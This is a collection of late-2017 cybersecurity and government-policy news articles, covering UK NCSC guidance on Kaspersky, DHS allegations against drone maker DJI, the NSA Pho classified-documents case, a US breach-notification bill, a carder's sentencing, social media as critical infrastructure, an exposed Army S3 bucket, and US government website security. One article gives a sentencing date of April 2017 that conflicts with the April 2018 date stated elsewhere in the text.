“The job of AV is to detect malware in a network and get rid of it. So to do its job properly, an AV product must (a) be highly intrusive within a network so it can find malware, and (b) be able to communicate back to the vendor so it knows what it is looking for and what needs to be done to defeat the infiltration. It is therefore obvious why this matters in terms of national security. We need to be vigilant to the risk that an AV product under the control of a hostile actor could extract sensitive data from that network, or indeed cause damage to the network itself.” reads the letter.

“That’s why the country of origin matters. It isn’t everything, and nor is it a simple matter of flags – there are Western companies who have non-Western contributors to their supply chain, including from hostile states. But in the national security space there are some obvious risks around foreign ownership.”

“The specific country we are highlighting in this package of guidance is Russia.”

The official warns that where access to the information by the Russian state would be a risk to national security, a Russia-based AV company should not be chosen, an obvious reference to the Kaspersky case.


The letter advises against using software developed by Russia-based companies on any system processing information classified SECRET and above.

“To that end, we advise that where it is assessed that access to the information by the Russian state would be a risk to national security, a Russia-based AV company should not be chosen. In practical terms, this means that for systems processing information classified SECRET and above, a Russia-based provider should never be used.” continues the Letter.

“This will also apply to some Official tier systems as well, for a small number of departments which deal extensively with national security and related matters of foreign policy, international negotiations, defence and other sensitive information.”

Martin confirmed that the NCSC is in discussion with Kaspersky Lab about whether an independently verifiable framework can be developed that would give the Government assurance about the security of the Russian firm’s involvement in the wider UK market.

“In particular we are seeking verifiable measures to prevent the transfer of UK data to the Russian state. We will be transparent about the outcome of those discussions with Kaspersky Lab and we will adjust our guidance if necessary in the light of any conclusions.” continues the Letter.

In response to the current situation, Kaspersky launched its Global Transparency Initiative in late October, which allows government agencies to review its security software for backdoors.


UK Warns Against Gov Use of Russia-based AV Companies
4.12.2017 securityweek BigBrothers
UK NCSC Chief Warns of Supply Chain Risk from Anti-Virus (AV) Software Products

The UK's National Cyber Security Center (NCSC) has warned against the UK government and its agencies using Kaspersky Lab products. The warning is not as forthright or as explicit as September's DHS ban on U.S. government agencies using Kaspersky; but it will, for the time being at least, have a similar effect in the UK.

On Friday, NCSC chief Ciaran Martin wrote to permanent secretaries (the most senior civil servants in a UK government ministry) warning about the issue of supply chain risk in cloud-based products. In this sense it is a general warning that all security officers would do well to heed. The NCSC is not a regulator and cannot insist -- but its guidance will undoubtedly be observed.

The warning focuses on Russia and explicitly calls out Kaspersky Lab.

"The NCSC advises that Russia is a highly capable cyber threat actor which uses cyber as a tool of statecraft. This includes espionage, disruption and influence operations. Russia has the intent to target UK central Government and the UK's critical national infrastructure," Martin wrote. "However," adds the letter, "the overwhelming majority of UK individuals and organisations are not being actively targeted by the Russian state, and are far more likely to be targeted by cyber criminals."

The unstated implication is that consumers can carry on using Kaspersky Lab, but that government -- or indeed any organization that processes information classified SECRET and above -- should never use a Russia-based AV provider. This idea is expanded in an associated blog post from Ian Levy, the NCSC technical director. He comments, "We see no compelling case at present to extend that advice to wider public sector, more general enterprises, or individuals." In fact, he goes further: "We really don't want people doing things like ripping out Kaspersky software at large, as it makes little sense."

However, there is also a silver lining for Kaspersky Lab in this warning. Kaspersky is specifically named only twice towards the end of the letter to the permanent secretaries. Firstly, the letter states that the NCSC is in discussion with the Russian firm "about whether we can develop a framework that we and others can independently verify, which would give the Government assurance about the security of their involvement in the wider UK market." Secondly, the letter adds that the NCSC will be transparent about the outcome of these discussions, and "will adjust our guidance if necessary in the light of any conclusions."

This is an approach that Kaspersky Lab has already offered to the U.S. government. In July 2017 Kaspersky Lab offered to give its source code to the U.S. government for analysis. "Anything I can do to prove that we don't behave maliciously I will do it," said CEO Eugene Kaspersky. There is precedent for such code review in the UK. In October, Kaspersky launched a Global Transparency Initiative whose goal is to help the company clear its name following the reports about its inappropriate ties to the Russian government.

Chinese firm Huawei's network products are effectively banned in the U.S. over fears that they could contain backdoors capable of leaking sensitive information back to China. These products are not banned in the UK -- largely down to the operations of a building, commonly known as The Cell, in the market town of Banbury. Here the NCSC has oversight of Huawei source code, and engineers reverse engineer the code looking for flaws and backdoors. Huawei has been given a green light in the UK.

If Kaspersky Lab and the NCSC can come to a similar arrangement with the anti-virus code, then a UK accommodation with Kaspersky Lab might be possible. Eugene Kaspersky is optimistic, tweeting on Saturday, "Let me stress: there is *no* ban for KL products in the UK. We are in touch with @NCSC regarding our Transparency Initiative and I am sure we will find the way to work together."

It will not be easy. Analyzing firmware in a hardware product is easier than analyzing the flow of traffic into and through the cloud; and it is noticeable that the NCSC's primary concern is "the issue of supply chain risk in cloud-based products."

"By definition," explains cyber security researcher and consultant Stewart Twyneham, "anti-virus software needs to have total access to a computer in order to prevent infection -- and modern quarantine mechanisms will often upload suspect viruses to the cloud so that researchers can learn more. This is alleged to have happened in the case of Nghia Hoang Pho back in 2015 -- who copied secret NSA security exploits onto his home computer, which was running Kaspersky's anti-virus."

Pho was charged and pleaded guilty late last week to removing and retaining top-secret documents from his employer, the NSA. The suggestion is that Russian intelligence learned of the presence of this data through automatic uploads of suspect malicious files to Kaspersky's cloud, and then hacked into Pho's computer. How Russian intelligence learned of the NSA files is unknown, and that is the cause for concern. But since this sort of knowledge cannot come from a code review, the possibility, even if not the probability, of a clandestine relationship between Kaspersky Lab and Russian intelligence can never be proven one way or the other.

If a Kaspersky Lab code review by NCSC finds no back doors or flaws in the software, it is still unlikely to change NCSC guidance over top secret documents. However, since there will be little interest from Russian intelligence in standard consumer computers, it could lead to a tacit acceptance guide for any user outside of government. Further, since the NCSC has promised to be transparent in any findings, that tacit acceptance could be interpreted as explicit acceptance for all users outside of government.

In March of this year, the NCSC warned about "the potential for hostile action against the UK political system." Without confirming that the main threat is from Russia, the letter makes it clear that the primary threat is considered to be that country.


DHS Says Drone Maker DJI Helping China Spy on U.S.
4.12.2017 securityweek BigBrothers
A memo from the U.S. Department of Homeland Security (DHS) warns that China-based Da-Jiang Innovations (DJI), one of the world’s largest drone manufacturers, has been providing information on critical infrastructure and law enforcement to the Chinese government.

The Los Angeles office of Immigrations and Customs Enforcement (ICE), specifically its Special Agent in Charge Intelligence Program (SIP), issued an intelligence bulletin back in August claiming that DJI is helping China spy on the United States.

A copy of the memo, marked “unclassified / law enforcement sensitive,” was published recently by the Public Intelligence project. The document, based on information from open source reporting and a “reliable source” in the unmanned aerial systems industry, assesses with moderate confidence that DJI is providing data on U.S. critical infrastructure and law enforcement to the Chinese government. The authors of the memo provide several examples of law enforcement and critical infrastructure organizations using DJI drones.

The agency also assesses with high confidence that the company is targeting government and private entities in these sectors in an effort to “expand its ability to collect and exploit sensitive U.S. data.”

ICE claims two of the Android applications provided by DJI for some of its drones automatically tag GPS imagery and location, register facial recognition data even when turned off, and access data in the user’s phone. The data, which the agency claims to include personal information and other sensitive data, such as power control panels and security measures for critical infrastructure sites, is allegedly stored on cloud servers to which the Chinese government “likely has access.”

“SIP Los Angeles assesses with high confidence the critical infrastructure and law enforcement entities using DJI systems are collecting sensitive intelligence that the Chinese government could use to conduct physical or cyber attacks against the United States and its population,” the memo reads. “Alternatively, China could provide DJI information to terrorist organizations, hostile non-state entities, or state-sponsored groups to coordinate attacks against U.S. critical infrastructure.”

The intelligence bulletin also points to a recent memo of the U.S. Army, which instructs units to stop using DJI drones due to cybersecurity vulnerabilities, and a U.S. Navy memo on the operational risks associated with the use of the Chinese firm’s products. DJI has taken some measures to improve privacy following the Army ban.

The ICE document also claims that DJI aggressively dropped drone prices in 2015 to force its main competitors out of the market.

“The bulletin is based on clearly false and misleading claims from an unidentified source,” DJI said in response to the ICE memo. “Several of the key claims made by this unnamed source show a fundamental lack of understanding of DJI, its technology and the drone market.”

The company claims its products are not capable of recognizing a person’s face for identification purposes – a feature exists for tracking the movement of the shape of a person or the shape of their face in order to control the drone, but DJI claims it only works when the system is powered on and the Active Track mode is enabled.

DJI also refutes claims that its pricing strategy has caused competitors to stop production, and denies selling its products cheaper in the U.S. than in China.

“DJI does strive to comply with local laws and regulations in each country where its drones operate and to facilitate compliance by our customers. To the extent that there are location-specific rules and policies within China, we ensure that our systems comply with these rules, including the need to register or include no-fly zones on board,” DJI stated.

“In compliance with the Chinese regulation, DJI utilizes the user’s IP address, GPS location, and MCC ID to determine if a drone is being operated in China. If so, DJI provides the customer with the features necessary to comply with Chinese regulations and policies. Otherwise, DJI provides no information about or data collected by the drone to the Chinese government,” the company added.

DJI has also shared some more information regarding a recent incident involving a researcher who took part in the company’s bug bounty program. The expert had been offered $30,000 after finding some serious vulnerabilities, but he walked away from the deal due to an agreement DJI had asked him to sign.

The accusations brought against DJI are similar to the allegations that Kaspersky Lab is spying for the Russian government. Kaspersky’s products have been banned in U.S. government agencies by the DHS after several media reports on the topic. However, no evidence has been provided to back the claims.


Here's the NSA Employee Who Kept Top Secret Documents at Home
3.12.2017 thehackernews BigBrothers
A former employee—who worked for an elite hacking group operated by the U.S. National Security Agency—pleaded guilty on Friday to illegally taking classified documents home, which were later stolen by Russian hackers.
In a press release published Friday, the US Justice Department announced that Nghia Hoang Pho, a 67-year-old from Ellicott City, Maryland, took documents containing top-secret national defense information from the agency between 2010 and 2015.
Pho, who worked as a developer for the Tailored Access Operations (TAO) hacking group at the NSA, reportedly took the classified documents and tools to his personal Windows computer at home, which was running Kaspersky Lab software.
According to authorities, Kaspersky Lab's antivirus software was allegedly used, one way or another, by Russian hackers to steal top-secret NSA documents and hacking exploits from Pho's home PC in 2015.
"Beginning in 2010 and continuing through March 2015, Pho removed and retained U.S. government documents and writings that contained national defense information, including information classified as Top Secret and Sensitive Compartmented Information," the DoJ said in disclosing Pho's guilty plea.
"This material was in both hard-copy and digital form, and was retained in Pho’s residence in Maryland."
For those unaware, the U.S. Department of Homeland Security (DHS) has banned Kaspersky Lab's antivirus software from all federal government computers over suspicion of the company's ties to Russian intelligence and spying fears.
Kaspersky CEO Says He Would Leave If Russia Asked Him To Spy
Though no substantial evidence has been made public, an article published by The Wall Street Journal (WSJ) in October claimed that Kaspersky software helped Russian spies steal highly classified documents and hacking tools belonging to the NSA in 2015 from a staffer's home PC.
However, Kaspersky Lab has denied any direct involvement with Russian spies in the alleged incident.
Just last month, Kaspersky said that its antivirus package running on Pho's home PC detected copies of the NSA exploits as malicious software and uploaded them to its cloud for further analysis by its team of researchers.
According to the company, as soon as its analysts realized that its antivirus had collected more than malicious binaries, the company immediately deleted the copy of the classified documents, and also created a special software tweak, preventing those files from being downloaded again.
When asked at a media briefing at Kaspersky's London offices on Tuesday whether Russian intelligence had ever asked him to help it spy on the West, CEO Eugene Kaspersky said: "They have never asked us to spy on people. Never."
Kaspersky further added: "If the Russian government comes to me and asks me to do anything wrong, or my employees, I will move the business out of Russia."
NSA Hacker Faces A Prison Sentence Of Up To 10 Years
In Pho's plea deal with prosecutors, the NSA hacker admitted that he copied information from NSA computers multiple times between 2010 and 2015 and took it all home with him.
Taking classified documents at home is a clear violation of known security procedures—and in this process, Pho eventually exposed the top secret information to Russian spies.
Pho pleaded guilty in a United States district court in Baltimore to one count of willful removal and retention of national defense information. No other charges were filed against him, and there is no mention of Pho selling or passing on the classified data.
The retention of national defense information offense carries a possible 10-year prison sentence.
Federal prosecutors said they would seek an eight-year sentence for Mr. Pho. However, his attorney can ask for a more lenient sentence.
Pho remains free while awaiting sentencing on April 6, 2018.


Kaspersky case – Now we know who is the NSA hacker who kept Agency’s cyber weapons at home
3.12.2017 securityaffairs BigBrothers

A former NSA hacker pleaded guilty on Friday to illegally taking classified documents home, which were later stolen by Russian cyber spies.
A member of the US National Security Agency Tailored Access Operations hacking team, Nghia Hoang Pho (67) pleaded guilty in a US district court in Baltimore on Friday to one count of willful retention of national defense information.

The Vietnam-born American citizen, who lives in Ellicott City, Maryland, has been charged with illegally removing top secret materials.

The NSA hacker admitted taking home copies of classified NSA hacking tools and exploits with the knowledge that they were cyber weapons.

The tools were detected by the Kaspersky Lab software installed on the NSA hacker’s personal computer and were sent back to Kaspersky’s server for further analysis.

Kaspersky Lab recently published a detailed report on how cyber spies could easily have stolen the software exploits from the NSA employee’s Windows PC.

According to the telemetry logs collected by the Russian firm, the staffer temporarily switched off the antivirus protection on the PC and infected his personal computer with spyware bundled in a product key generator while trying to use a pirated copy of Office.

On September 11, 2014, Kaspersky antivirus detected the Win32.GrayFish.gen trojan on the NSA employee’s PC; some time later the employee disabled the Kaspersky software to execute the activation-key generator.

When the antivirus was reactivated on October 4, it removed the backdoored key-gen tool from the NSA employee’s PC and uploaded it to Kaspersky’s cloud for further analysis.

Kaspersky published a second report that sheds light on the investigation conducted by the firm into the NSA-linked Equation Group APT.

Kaspersky began running searches in its databases from June 2014, six months prior to the year of the alleged hack of its antivirus, for all alerts triggered by wildcard signatures such as “HEUR:Trojan.Win32.Equestre.*”. The experts found a few test signatures in place that produced a LARGE number of false positives.

The analysis revealed one specific signature, “HEUR:Trojan.Win32.Equestre.m”, that fired a large number of times in a short time span on just one system, together with a 7zip archive (referred to below as “[undisclosed].7z”). This was the starting point for the analysis of that system, which was found to contain not only this archive but many files, both common and unknown, indicating that the user was probably a person involved in the malware’s development.

The analysis of the computer where the archive was found revealed that it was already infected with malware. In October of that year the user downloaded a pirated copy of Microsoft Office 2013, but the .ISO contained the Mokes backdoor.

Kaspersky was able to detect and halt Mokes, but the user turned off the Russian software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two-month period its security software found 128 separate malware samples on the machine that were not related to the Equation Group.

Kaspersky found that the Mokes’ command and control servers were apparently being operated by a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com.”

The security firm explained that it’s also possible that the NSA contractor’s PC may have been infected with a sophisticated strain of malware developed by an APT that was not detected at the time.


The NSA hacker Pho now faces roughly six to eight years in prison, with sentencing set for April 2017.

According to the plea deal, Pho broke federal law because he took the code home multiple times: he admitted that, over a five-year period starting in 2010, he copied the information from NSA machines and took it all home with him.

“Beginning in 2010 and continuing through March 2015, Pho removed and retained U.S. Government documents and writings that contained national defense information, including information classified as Top Secret and Sensitive Compartmented Information,” the US Department of Justice said in disclosing the guilty plea.

“This material was in both hard-copy and digital form, and was retained in Pho’s residence in Maryland.”

The positive aspect of the story is that Pho did not act for cyber espionage purposes; he was not charged with selling or passing off any of the data.

The fact that Pho is the third NSA employee charged in the past two years with taking home top-secret information is embarrassing and highlights the insider risk.


Elite U.S. Government Hacker Charged With Taking Secret Information
2.12.2017 securityweek BigBrothers
A member of the US National Security Agency's elite hacking team has been charged with illegally removing top secret materials, in an embarrassing breach for the crucial electronic espionage body.

The Justice Department said Friday that Nghia Hoang Pho, 67, a 10-year veteran of the NSA's Tailored Access Operations unit, which broke into computer systems, agreed to plead guilty to a single charge of removing and retaining top-secret documents from the agency.

He kept the material at his Ellicott City, Maryland home.

According to The New York Times, it was Vietnam-born Pho's computer that apparent Russian hackers accessed via his use of Kaspersky software to steal files and programs the NSA developed for its own hacking operations.

The Justice Department said Pho had taken printed and digital copies of documents and writings labelled "secret," and containing sensitive "national defense information," and stored them in his home from 2010 until he was caught in 2015.

It gave no detail on why he did that, and did not say whether Pho had revealed or lost any of the information.

Pho faces up to 10 years in prison, though could negotiate a lighter punishment.

He was the third NSA employee charged in the past two years for taking home top-secret information.

The NSA declined to respond to questions on the case.

In October The Wall Street Journal reported that Russian hackers exploited anti-virus software made by Kaspersky Lab to steal top secret materials from an unnamed NSA employee.

The Journal said the 2015 hack led to the Russians obtaining information on how the NSA itself penetrates foreign computer networks and protects itself from cyberattacks.

The incident was a key reason why the US government earlier this year announced a ban on use of Kaspersky anti-virus software on government computers, warning that the Moscow-based company has suspect links to Russian intelligence.

Kaspersky denies any ties to the Russian government, but said its own forensic investigation did show that hackers made use of its software to break into the NSA worker's home computer.

Kaspersky said what was stolen included essential source code for so-called Equation Group hacking software from the NSA.


Senators Propose New Breach Notification Law
2.12.2017 securityweek BigBrothers
Senators Propose New Data Protection Bill Following Equifax and Uber Breaches

Following the Equifax breach and the hidden Uber breach, three U.S. senators have introduced the Data Security and Breach Notification Act. Its purpose is to ensure better protection of personal information, and to provide a nationwide standard breach notification requirement. It is effectively a re-introduction of the 2015 bill of the same name.

The bill is sponsored by three Democrats: Sen. Bill Nelson of Florida, Sen. Richard Blumenthal of Connecticut, and Sen. Tammy Baldwin of Wisconsin. Statements from Nelson and Baldwin show clearly that the recent Uber and Equifax breaches are the specific catalysts.

"The recent data breaches, from Uber to Equifax, will have profound, long-lasting impacts on the integrity of many Americans' identities and finances, and it is simply unacceptable that millions of them may still not know that they are at risk, nor understand what they can and should do to help limit the potential damage," said Senator Baldwin.

"We need a strong federal law in place to hold companies truly accountable for failing to safeguard data or inform consumers when that information has been stolen by hackers," said Nelson. "Congress can either take action now to pass this long overdue bill or continue to kowtow to special interests who stand in the way of this commonsense proposal. When it comes to doing what's best for consumers, the choice is clear."

There are three noteworthy aspects to this bill: 30 days to disclose following a breach; up to five years in prison for failure to do so; and the FTC with NIST to draw up recommendations on the technology or methodologies necessary to avoid such sanctions.

Under this bill, customers affected by a breach must be informed within 30 days if they are at risk. "There shall be a presumption that no reasonable risk of identity theft, fraud, or other unlawful conduct exists following a breach of security if," says the bill, the data is adequately indecipherable, for example (although not specified), by encryption.

The FTC/NIST 'standards' requirement is in the bill to define how and with what technology personal data can be made indecipherable -- and is likely to dismay security officers with yet another standard that must be observed. The potential for regulatory confusion can be seen in a comparison between this data 'privacy' requirement and that of Europe's General Data Protection Regulation (GDPR).

Staying with the example of Uber and Equifax, both companies would be liable under both laws if they were already in force. The basic requirement under GDPR is notification within 72 hours to the regulator (Article 33), or without undue delay to customers (Article 34) if they are at risk from the breach. It is 30 days under the U.S. law.

Since many surveys have repeatedly demonstrated that not all U.S. companies understand GDPR, or even know that they will be liable under it, it is possible that some will wrongly assume they have an additional four weeks before being required to disclose. Just as disconcerting would be for EU customers to learn of their danger before their American counterparts.

"It's surprising that U.S. still lacks a single federal regulation covering mandatory breach disclosures," Matt Lock, director of sales engineers at Varonis told SecurityWeek. "The proposed 30-day notification rule is a step in the right direction, but a far cry from the GDPR's 72-hour rule. If the U.S. legislation passed, it's not difficult to imagine a situation in which EU consumers would learn of a breach hitting a U.S. company long before U.S. consumers are notified."

Lock believes that best timescale would be something between the two. "U.S. lawmakers want to show their support of constituents and their distaste for companies that try to fly under the radar in the wake of a major breach," he said. "But they are also trying to be more realistic. Anyone who has spent time on an incident response team knows how chaotic the first 72-hours can be. Perhaps 30 days is a bit too lenient, but the GDPR 72-hour window may result in businesses scrambling and disclosing incomplete or inaccurate information."

There is one major difference between the U.S. bill and GDPR: GDPR has huge financial sanctions but no prison time, while Nelson's bill has no specified financial sanction, but up to five years in prison. "With this new legislation bill, companies providing services to both the US and EU citizens will have two major breach notification requirements that come with significant impact," comments Thycotic's chief security scientist Joseph Carson. "From huge financial sanctions in the EU that could be as much as 4% of annual turnover globally, and -- if customers are not notified in 30 days -- a prison term in the U.S. These two major legal requirements could change the way companies approach and prioritize cybersecurity and risk meaning they could no longer ignore the need for better security."


Russian Cybercriminal Gets Another Prison Sentence
1.12.2017 securityweek BigBrothers
Roman Valeryevich Seleznev, the son of a Russian lawmaker, has been handed another prison sentence in the United States for his role in a massive cybercrime ring.

The 33-year-old, known online as Track2, Bulba and Ncux, was previously sentenced by a U.S. court to 27 years in prison for 38 counts of wire fraud, hacking, identity theft, and payment card fraud.

After pleading guilty to racketeering and conspiracy to commit bank fraud charges on September 7, he received another 14-year prison sentence for the first charge in Nevada and another 14 years for the second charge in Georgia. The sentences will run concurrently to each other and to the previous 27-year sentence.

Seleznev has also been ordered to pay nearly $51 million in the Nevada case and over $2.1 million in the Georgia case.

According to authorities, Seleznev admitted being part of Carder.su, an Internet-based organization that specialized in identity theft and credit card fraud. The Russian national created a website, which he advertised on Carder.su, to allow fraudsters to easily purchase stolen payment card data for roughly $20 per account number.

Authorities estimate that activities conducted by members of Carder.su resulted in victims losing a total of $50,893,166.35, the exact amount that Seleznev has been ordered to pay.

In the Georgia case, Seleznev admitted being a “casher” (i.e. an individual who withdraws cash using stolen bank account information) in a scheme targeting an Atlanta-based firm that processed credit and debit card transactions for financial institutions. Hackers breached the company’s systems and obtained more than 45 million payment cards, which they used to withdraw over $9.4 million from 2,100 ATMs in 280 cities worldwide. The money was withdrawn in less than 12 hours.

Law enforcement conducted a massive operation targeting Carder.su users and operators. A total of 55 individuals have been charged and 33 of them have already been convicted; the rest are either pending trial or are on the run.


Should Social Media be Considered Part of Critical Infrastructure?
30.11.2017 securityweek BigBrothers

Is Social Media a Critical Industry?

Russia interfered in the U.S. 2016 election, but did not materially affect it. That is the public belief of the U.S. intelligence community. It is a serious accusation and has prompted calls for additions to the official 16 critical infrastructure categories. One idea is that 'national elections' should be included. A second, less obviously, is that social media should be categorized as a critical industry.

The reason for the latter is relatively simple: social media as a communications platform is being widely used by adversary organizations and nations to disseminate their own propaganda. This ranges from ISIS using it as a recruitment platform, to armies of Russian state-sponsored trolls manipulating public opinion via Twitter.

Russian interference, or opinion manipulation, has not been limited to the U.S. Both France and Germany worried about it prior to their own national elections. On Nov. 3, this year, Damian Collins, Chair of the Digital Culture and Sport Select Committee in the UK wrote to Twitter's Jack Dorsey asking for information on the so-called Russian Internet Research Agency. He asked for a list of Russian accounts and posts linked to politics in the UK. Brexit is not mentioned, but interference in the UK Brexit referendum is clearly the concern.

One week later, CNN Money reported, "A network of Twitter accounts with ties to the Russian government-linked troll army that meddled in U.S. politics posted dozens of pro-Brexit messages on the day of the referendum on the United Kingdom's membership of the European Union in June 2016."

The assumed purpose of Russian interference in politics has been to promote extreme right-wing national populist movements that would weaken centrist governments. This is clearly an 'attack' against western nations, delivered primarily via social networks. It is noticeable that in both the US election and the Brexit referendum there was a late and in many ways unexpected shift to the right.

Nevertheless, the idea of social media as a critical industry is a difficult concept. Malcolm Harkins, chief security and trust officer at Cylance, doesn't think it is a great stretch. He points to the origins of the existing 16 industry sectors and notes that the primary motivation is to maintain their availability following the 9/11 attack.

The DHS introduces its definition of the critical infrastructure with, "There are 16 critical infrastructure sectors whose assets, systems, and networks, whether physical or virtual, are considered so vital to the United States that their incapacitation or destruction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof." These include 'energy', 'finance', 'transport', 'communications' and 'IT'. Maintaining the availability and continued operation of all of these sectors is clearly critical to the well-being of the nation. Maintaining the availability of social media does not seem so critical.

Harkins' argument, however, is that the world has changed since the origins of the critical infrastructure classification.

Business and society have gone through, and are still going through, a dramatic 'digitization' of their operations. The internet and all things cyber have become fundamental to the operation of the economy and society.

"Where cyber is concerned," Harkins told SecurityWeek, "the 'A' of 'CIA' is not enough. The Availability of the critical infrastructure must now be bolstered by the Integrity of the critical infrastructure."

This should not be considered a trivial concern. The manipulation of information has always been a part of warfare, usually as a precursor to a kinetic attack.

"There has always been the notion of information manipulation in warfare -- such as deception," says Harkins. "If you can manipulate your enemy prior to a kinetic event, then you would have advantage over them."

From Alexander's victory over Porus in 326 BC, through the Allied landings in Normandy in 1944, to Stormin' Norman's Desert Storm in 1991, campaigns have relied heavily on feeding the enemy misinformation.

"The world today," he continued, "is based on information with headlong digitization of both business and society. With everything now based on our reaction to and use of information, the integrity of that information has never been more vital."

The availability of the Communications and IT sectors is already considered critical, and social media is the most important and widespread platform that unites the communications and IT sectors. If the concept of the critical infrastructure is widened from availability to include integrity, then social media is already, de facto, part of the critical infrastructure. "At what point," asks Harkins, "does the integrity of the information flowing through the IT sector or the communications sector hit a significant and material risk that will force us to consider it critical?"

How this could work in practice is a different matter, for it couldn't be limited to integrity in social media platforms. Facebook is not the only advertising medium that could run propagandist advertising (some 3,000 Russia-linked advertisements were placed on Facebook in 2016 apparently designed to influence the presidential election). "My guess is that even well beyond social media, mainstream physical advertising has been bought and used for the purpose of manipulating national sentiment." If social media can be considered 'critical', then the whole concept of Fake News must be treated in the same way.

That would be a major task. Social media is perhaps the most pressing aspect of this, and could even prove a testbed for wider communications controls. "I think the case increasingly can, and will be made that social media is a part of critical infrastructure in that Twitter, Facebook and other media channels have become the 'go-to' resources for a large percentage of Americans," comments Dan Lohrmann, CSO at Security Mentor. "Yes - social media is slowly becoming a critical part of critical infrastructure for our nation and other developed countries."

But Nathan Wenzler, chief security strategist at AsTech, is not sure we are ready for this. He takes the 'availability' view of critical infrastructure. "Even with the potential influence of the last U.S. presidential election, I do not believe we should be looking at these social media services in the same way we view power, water, and other utility services which are required for people's daily lives," he told SecurityWeek. "If social media services were disrupted... there would be some outrage by the users, but by and large, their lives would not be dramatically impacted from a health or well-being standpoint. For this reason alone, I don't see that we're quite at the point of considering social media to be the same as these other critical services."

He believes things may change in the future, but raises two of the many practical problems that will arise: accountability for users and attribution for attackers. Chris Roberts, chief security architect at Acalvio, takes a similar view. "We have little ability or success in being able to protect that which is already classified as critical infrastructure. The red tape is worn thin with excuses: the technology is not in place to deal with both 20 year old systems and modern insecure devices interconnected through a cloud-like pea-soup fog," he said.

"If you want to consider the core systems as critical infrastructure, then you have to be able to manage, control and understand the access permissions, uniquely identify individuals and put some controls into access and other areas. That both seems like a tall challenge (getting 300M Americans to agree to security controls for their social media) and also something that might eventually break the constitutional rights of those folks to actually speak freely. If you put controls in place, where does that end?"

But if Harkins is right and the concept of integrity will need to be added to the concept of availability for the critical infrastructure, then something will have to change. There are signs that governments are beginning to feel threatened and therefore concerned. The UK government has been particularly vociferous over the last year, telling the social tech giants that if they don't get their house in order, government will do it for them.

Indeed, the current government's manifesto (a pre-election statement of intent) contains a strong purpose to control social media. "Some people say that it is not for government to regulate when it comes to technology and the internet," it says. "We disagree... it is for government, not private companies, to protect the security of people and ensure the fairness of the rules by which people and businesses abide."

The clear implication is that the tech giants' protestations of: 'don't limit freedom of speech', 'legislation will stifle innovation', and 'it's not technologically possible' will not be accepted. Even U.S. lawmakers seem to be moving in a similar direction. On Tuesday, Nov. 21, counsels for Google, Facebook and Twitter were in Washington answering questions put at the Senate hearing on social media's role in the 2016 election.

At one point, Senator John Kennedy (R-LA) said, "I don't believe you have the ability to identify all your advertisers." The tech companies effectively admitted this -- although the reality is probably they cannot control advertising without losing some of it. But if government wishes to prevent foreign entities interfering in future elections, this quality of knowledge is essential. Social media should take note that there is precedent; government has enforced advertising control on new technology in the past. In the 1930s, new radio services carried misinformation and propaganda in the form of advertisements. The government cracked down on this with the 1934 Communications Act, placing greater responsibility on the medium to choose which advertisements it accepted. It could do similar with social media.

The likelihood of some legislative control over social media is growing. In the U.S. the primary concern seems to be its potential for foreign propaganda aimed at controlling national sentiment.

In the UK the primary concern is its use by terrorist groups and organized crime -- although there is now some concern that Russia may have attempted to influence the Brexit referendum.

If Harkins is right, then this is really the visible effect of an underlying need to add integrity to the availability of the critical infrastructure. And if that is correct, then the legislation will need to apply to the whole communications sector and not just the social media aspect. But it goes further. If the need to apply integrity has grown through the digitization of industry, then the implication is that it will require confidentiality as well as integrity and availability if its security is to be assured. Confidentiality is best applied through encryption; and we are seeing increasing interest by government in controlling encryption. That, however, is a different battle; and both would benefit from a national debate.


Classified U.S. Army Data Found on Unprotected Server
29.11.2017 securityweek BigBrothers
Tens of gigabytes of files apparently belonging to the United States Army Intelligence and Security Command (INSCOM), including classified information, were stored in an unprotected AWS S3 bucket, cyber resilience firm UpGuard reported on Tuesday.

According to the company, its director of cyber risk research, Chris Vickery, discovered the data on an AWS subdomain named “inscom” in late September.

Fort Belvoir, Virginia-based INSCOM is an intelligence command operated by both the U.S. Army and the National Security Agency (NSA).

The AWS storage container found by UpGuard included, among others, a virtual machine image that may have been used to send, receive and handle classified data. Some of the files contained in the VM were marked as “Top Secret” and “NOFORN,” which indicates that the information cannot be shared with foreign nationals.

Metadata found by researchers indicated that a now-defunct defense contractor named Invertix had worked in some capacity on the data stored in the virtual machine. The files in the bucket also included Invertix private keys and other data that could have provided access to the contractor’s internal systems, UpGuard said.

The exposed files also included information on a failed Army program named “Red Disk.” The $93 million program, designed to allow troops to exchange information in real time, was a cloud computing component of the Distributed Common Ground System–Army (DCGS-A) intelligence platform. The misconfigured container also stored details on the DCGS-A itself.

“Plainly put, the digital tools needed to potentially access the networks relied upon by multiple Pentagon intelligence agencies to disseminate information should not be something available to anybody entering a URL into a web browser,” said UpGuard’s Dan O'Sullivan.

“It is unnecessary to speculate as to the potential value of such an exposed bucket to foreign intelligence services or malicious individual actors; the care taken to classify sections of the exposed virtual drive as ‘Top Secret’ and ‘NOFORN’ provide all the indications necessary to determine how seriously this data was taken by the Defense Department,” he added.

INSCOM has not responded to SecurityWeek’s request for comment. The data is no longer accessible, but it’s still unclear who is responsible for exposing it.

This is not the first time UpGuard claims to have found data belonging to the Pentagon and other U.S. government organizations. The list of impacted agencies includes the National Geospatial-Intelligence Agency (NGA), the Central Command (CENTCOM) and the Pacific Command (PACOM), the Secret Service, and the Department of Homeland Security (DHS).

The common denominator in these incidents was unprotected S3 buckets operated by third-party contractors.


Security of U.S. Government Sites Improved Only Slightly: Report
28.11.2017 securityweek BigBrothers
The security of websites owned by the United States government has improved only slightly in the past months, according to a report published on Monday by the Information Technology and Innovation Foundation (ITIF).

ITIF has analyzed nearly 300 of the most visited U.S. government websites to see if they are fast, secure, mobile friendly, and accessible for users with disabilities. In terms of security, the study focused on whether these sites use HTTPS, DNSSEC, and if they are affected by known vulnerabilities.

According to ITIF, of the government websites included in the top 100,000 of the Majestic Million ranking, 75% use HTTPS, which encrypts communications between the user’s browser and the site. This represents a 3% decrease compared to data from a report published by the organization in March. However, overall, the percentage of government sites that have properly implemented SSL has increased from 67% to 71%.

Of the 260 sites tested for both reports, 31% showed improvement in SSL deployment, while 14% were less secure.


The U.S. Department of Homeland Security (DHS) recently ordered all federal agencies to start using web and email security technologies such as HTTPS, DMARC and STARTTLS within the next few months.

ITIF’s report shows that 8% of websites have not implemented HTTPS at all, but this is still an improvement compared to the 14% from the previous report. The Department of Defense (defense.gov) is one of the agencies that recently rolled out HTTPS, and the International Trade Administration (trade.gov) is among those that still lack the security feature.

